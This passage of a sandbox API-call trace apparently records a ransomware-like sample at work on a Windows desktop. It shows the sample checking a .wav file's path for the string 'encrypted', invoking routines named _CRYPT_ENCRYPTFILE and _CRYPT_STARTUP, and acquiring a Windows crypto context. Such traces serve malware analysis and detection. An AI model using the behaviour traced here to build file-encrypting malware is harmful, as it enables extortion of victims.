HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WgswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gswrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rxrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xrAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rAQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AQIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QIdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IdMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dMFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MFU5.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0032.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0032.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c20c0 [0032.442] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0032.443] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0032.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af7c8 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af338 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0032.443] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af348 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ceb0 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0032.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.444] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0032.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0032.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0032.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0032.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0032.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.445] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.445] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.445] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.445] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.445] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.445] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe74f0990, ftCreationTime.dwHighDateTime=0x1d5c506, ftLastAccessTime.dwLowDateTime=0xb2382ea0, ftLastAccessTime.dwHighDateTime=0x1d5bf46, ftLastWriteTime.dwLowDateTime=0xb2382ea0, ftLastWriteTime.dwHighDateTime=0x1d5bf46, nFileSizeHigh=0x0, nFileSizeLow=0x13bb6, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="_WgswrxrAQIdMFU5.wav", cAlternateFileName="_WGSWR~1.WAV")) returned 0x7c2100 [0032.445] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0032.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.445] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.445] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0032.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0032.446] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.446] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.446] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.446] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.446] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0032.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0032.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0032.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.446] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.446] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.446] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0032.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.446] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.446] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0032.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0032.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0032.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0032.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0032.447] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.447] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.447] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0032.447] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0032.447] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.447] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0032.448] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 